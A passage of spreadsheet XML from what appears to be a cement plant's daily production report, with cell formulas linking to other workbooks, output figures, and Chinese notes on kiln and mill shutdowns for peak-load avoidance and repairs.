        <f>'[13]1'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]1'!$E$24</f>
        <v>5087</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'r'!H61</f>
        <v>5087</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1381486</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]1'!$I$24</f>
        <v>5187.95</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'r'!K61</f>
        <v>5187.95</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1368311.881</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]1'!$L$24</f>
        <v>48751.7339999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>108.337186666666</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]1'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]1'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]1'!$R$30</f>
        <v>268.38</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'r'!U56</f>
        <v>268.38</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>63266.851</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]1'!$V$30</f>
        <v>233.508</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'r'!X56</f>
        <v>233.508</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>60849.745</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]1'!$Y$30</f>
        <v>3286.24600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]1'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]1'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'r'!H62</f>
        <v>2e-11</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]1'!$I$19</f>
        <v>4885.218</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'r'!K62</f>
        <v>4885.218</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1286579.418</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]1'!$L$19</f>
        <v>100161.22500005</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>69.0767068965864</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'[13]1'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]1'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'r'!H63</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]1'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'r'!K63</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]1'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]1'!$M$21+'[14]1'!$M$22+'[14]1'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]1'!$N$21+'[14]1'!$N$22+'[14]1'!$N$35</f>
        <v>43.34</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'r'!U58</f>
        <v>43.34</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38377.767</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]1'!$Q$21+'[14]1'!$Q$22+'[14]1'!$Q$35</f>
        <v>69</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'r'!X58</f>
        <v>69</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39560</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]1'!$T$21+'[14]1'!$T$22+'[14]1'!$T$35</f>
        <v>1623.287</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]1'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'r'!H64</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]1'!$I$47</f>
        <v>1107.886</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'r'!K64</f>
        <v>1107.886</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>212549.736</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]1'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]1'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]1'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]1'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'r'!U58</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]1'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'r'!X58</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]1'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]1'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'r'!H65</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]1'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'r'!K65</f>
        <v>0</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>35435.65</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]1'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]1'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]1'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]1'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]1'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]1'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]1'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]1'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]1'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'r'!H66</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'r'!K66</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]1'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-24:00避峰停机；3#磨：9:20-22:10避峰停机；4#磨：大修续停。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G57+'r'!H67</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'r'!K67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G58+'r'!H68</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'r'!K68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G59+'r'!H69</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'r'!K69</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]1'!$Q$65</f>
        <v>窑:6:18-24:00头排变频器进线柜短路多元件损坏停窑（电气）。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。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G60+'r'!H70</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'r'!K70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'[14]1'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]1'!$E$6</f>
        <v>2704</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'r'!H71</f>
        <v>2704</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1118577</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]1'!$E$21</f>
        <v>3242.83</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'r'!K71</f>
        <v>3242.83</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1104402.91</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]1'!$H$6</f>
        <v>37230.3399999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>71.5968076923075</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'[14]1'!$M$11+'[14]1'!$M$12+'[14]1'!$M$13+'[14]1'!$M$14+'[14]1'!$M$15+'[14]1'!$M$16+'[14]1'!$M$17+'[14]1'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]1'!$N$11+'[14]1'!$N$12+'[14]1'!$N$13+'[14]1'!$N$14+'[14]1'!$N$15+'[14]1'!$N$16+'[14]1'!$N$17+'[14]1'!$N$18</f>
        <v>0</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'r'!H72</f>
        <v>0</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>835993.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]1'!$Q$11+'[14]1'!$Q$12+'[14]1'!$Q$13+'[14]1'!$Q$14+'[14]1'!$Q$15+'[14]1'!$Q$16+'[14]1'!$Q$17+'[14]1'!$Q$18</f>
        <v>1952</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'r'!K72</f>
        <v>1952</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>836424.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]1'!$T$11+'[14]1'!$T$12+'[14]1'!$T$13+'[14]1'!$T$14+'[14]1'!$T$15+'[14]1'!$T$16+'[14]1'!$T$17+'[14]1'!$T$18</f>
        <v>16502.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>66.0105359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]1'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]1'!$M$19+'[14]1'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]1'!$N$19+'[14]1'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'r'!H73</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]1'!$Q$19+'[14]1'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'r'!K73</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]1'!$T$19+'[14]1'!$T$20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G64+'r'!H74</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'r'!K74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G65+'r'!H75</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'r'!K75</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]1'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:25避峰停机。2#磨:8:00-24:00避峰停机。3#磨:9:45-23:30避峰停机。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G66+'r'!H76</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'r'!K76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G67+'r'!H77</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'r'!K77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'[15]1'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]1'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'r'!H78</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]1'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'r'!K78</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]1'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]1'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]1'!$D$43+'[15]1'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]1'!$E$43+'[15]1'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'r'!H79</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]1'!$H$43+'[15]1'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'r'!K79</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]1'!$K$43+'[15]1'!$K$44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'[15]1'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]1'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'r'!H80</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]1'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'r'!K80</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]1'!$K$45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G71+'r'!H81</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'r'!K81</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]1'!$Q$80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G72+'r'!H82</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'r'!K82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G73+'r'!H83</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'r'!K83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G74+'r'!H84</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'r'!K84</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]1'!$Q$83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G75+'r'!H85</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'r'!K85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G76+'r'!H86</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'r'!K86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G77+'r'!H87</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'r'!K87</f>
        <v>0</v>
      </c>
      <c r="L77" s="194">
        <f>K77+yc!L77</f>
        <v>0</v>
      </c>
      <c r="M77" s="241"/>
      <c r="N77" s="241"/>
      <c r="O77" s="223" t="s">
        <v>286</v>
      </c>
      <c r="P77" s="259"/>
      <c r="Q77" s="313"/>
      <c r="R77" s="313"/>
      <c r="S77" s="313"/>
      <c r="T77" s="313"/>
      <c r="U77" s="313"/>
      <c r="V77" s="313"/>
      <c r="W77" s="313"/>
      <c r="X77" s="313"/>
      <c r="Y77" s="313"/>
      <c r="Z77" s="314"/>
    </row>
    <row r="78" ht="15.75" customHeight="1" spans="1:26">
      <c r="A78" s="287"/>
      <c r="B78" s="191"/>
      <c r="C78" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D78" s="193"/>
      <c r="E78" s="241"/>
      <c r="F78" s="241"/>
      <c r="G78" s="241"/>
      <c r="H78" s="194">
        <f>G78+'r'!H88</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'r'!K88</f>
        <v>0</v>
      </c>
      <c r="L78" s="194">
        <f>K78+yc!L78</f>
        <v>0</v>
      </c>
      <c r="M78" s="241"/>
      <c r="N78" s="241"/>
      <c r="O78" s="223"/>
      <c r="P78" s="264"/>
      <c r="Q78" s="193"/>
      <c r="R78" s="193"/>
      <c r="S78" s="193"/>
      <c r="T78" s="193"/>
      <c r="U78" s="193"/>
      <c r="V78" s="193"/>
      <c r="W78" s="193"/>
      <c r="X78" s="193"/>
      <c r="Y78" s="193"/>
      <c r="Z78" s="315"/>
    </row>
    <row r="79" ht="15.75" customHeight="1" spans="1:26">
      <c r="A79" s="300" t="s">
        <v>311</v>
      </c>
      <c r="B79" s="203" t="s">
        <v>227</v>
      </c>
      <c r="C79" s="203"/>
      <c r="D79" s="203"/>
      <c r="E79" s="301">
        <v>18000</v>
      </c>
      <c r="F79" s="301"/>
      <c r="G79" s="301">
        <f>'[16]1'!$E$7</f>
        <v>682.84</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'r'!H89</f>
        <v>682.84</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>147811.31</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]1'!$I$7</f>
        <v>478</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'r'!K89</f>
        <v>478</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>142369.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]1'!$L$7</f>
        <v>5089.62</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.17924</v>
      </c>
      <c r="O79" s="223"/>
      <c r="P79" s="264"/>
      <c r="Q79" s="193"/>
      <c r="R79" s="193"/>
      <c r="S79" s="193"/>
      <c r="T79" s="193"/>
      <c r="U79" s="193"/>
      <c r="V79" s="193"/>
      <c r="W79" s="193"/>
      <c r="X79" s="193"/>
      <c r="Y79" s="193"/>
      <c r="Z79" s="315"/>
    </row>
    <row r="80" ht="15.75" customHeight="1" spans="1:26">
      <c r="A80" s="300"/>
      <c r="B80" s="203" t="s">
        <v>283</v>
      </c>
      <c r="C80" s="203"/>
      <c r="D80" s="303" t="s">
        <v>250</v>
      </c>
      <c r="E80" s="301"/>
      <c r="F80" s="301"/>
      <c r="G80" s="301">
        <f>'[16]1'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'r'!H90</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]1'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'r'!K90</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]1'!$Y$15</f>
        <v>0</v>
      </c>
      <c r="N80" s="304">
        <f>(M80+M81)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O80" s="223"/>
      <c r="P80" s="264"/>
      <c r="Q80" s="193"/>
      <c r="R80" s="193"/>
      <c r="S80" s="193"/>
      <c r="T80" s="193"/>
      <c r="U80" s="193"/>
      <c r="V80" s="193"/>
      <c r="W80" s="193"/>
      <c r="X80" s="193"/>
      <c r="Y80" s="193"/>
      <c r="Z80" s="315"/>
    </row>
    <row r="81" ht="15.75" customHeight="1" spans="1:26">
      <c r="A81" s="300"/>
      <c r="B81" s="203"/>
      <c r="C81" s="203"/>
      <c r="D81" s="203" t="s">
        <v>284</v>
      </c>
      <c r="E81" s="301"/>
      <c r="F81" s="301"/>
      <c r="G81" s="301"/>
      <c r="H81" s="194">
        <f>G81+'r'!H91</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'r'!K91</f>
        <v>0</v>
      </c>
      <c r="L81" s="301">
        <f>K81+yc!L81</f>
        <v>0</v>
      </c>
      <c r="M81" s="301"/>
      <c r="N81" s="305"/>
      <c r="O81" s="223"/>
      <c r="P81" s="264"/>
      <c r="Q81" s="193"/>
      <c r="R81" s="193"/>
      <c r="S81" s="193"/>
      <c r="T81" s="193"/>
      <c r="U81" s="193"/>
      <c r="V81" s="193"/>
      <c r="W81" s="193"/>
      <c r="X81" s="193"/>
      <c r="Y81" s="193"/>
      <c r="Z81" s="315"/>
    </row>
    <row r="82" ht="15.75" customHeight="1" spans="1:26">
      <c r="A82" s="300"/>
      <c r="B82" s="203" t="s">
        <v>253</v>
      </c>
      <c r="C82" s="203"/>
      <c r="D82" s="203"/>
      <c r="E82" s="301"/>
      <c r="F82" s="301"/>
      <c r="G82" s="301"/>
      <c r="H82" s="194">
        <f>G82+'r'!H92</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'r'!K92</f>
        <v>0</v>
      </c>
      <c r="L82" s="301">
        <f>K82+yc!L82</f>
        <v>0</v>
      </c>
      <c r="M82" s="301"/>
      <c r="N82" s="302"/>
      <c r="O82" s="223"/>
      <c r="P82" s="264"/>
      <c r="Q82" s="193"/>
      <c r="R82" s="193"/>
      <c r="S82" s="193"/>
      <c r="T82" s="193"/>
      <c r="U82" s="193"/>
      <c r="V82" s="193"/>
      <c r="W82" s="193"/>
      <c r="X82" s="193"/>
      <c r="Y82" s="193"/>
      <c r="Z82" s="315"/>
    </row>
    <row r="83" ht="15.75" customHeight="1" spans="1:26">
      <c r="A83" s="300"/>
      <c r="B83" s="203" t="s">
        <v>254</v>
      </c>
      <c r="C83" s="203"/>
      <c r="D83" s="203"/>
      <c r="E83" s="301">
        <v>18000</v>
      </c>
      <c r="F83" s="301"/>
      <c r="G83" s="301"/>
      <c r="H83" s="194">
        <f>G83+'r'!H93</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'r'!K93</f>
        <v>0</v>
      </c>
      <c r="L83" s="301">
        <f>K83+yc!L83</f>
        <v>0</v>
      </c>
      <c r="M83" s="301"/>
      <c r="N83" s="302"/>
      <c r="O83" s="223"/>
      <c r="P83" s="264"/>
      <c r="Q83" s="193"/>
      <c r="R83" s="193"/>
      <c r="S83" s="193"/>
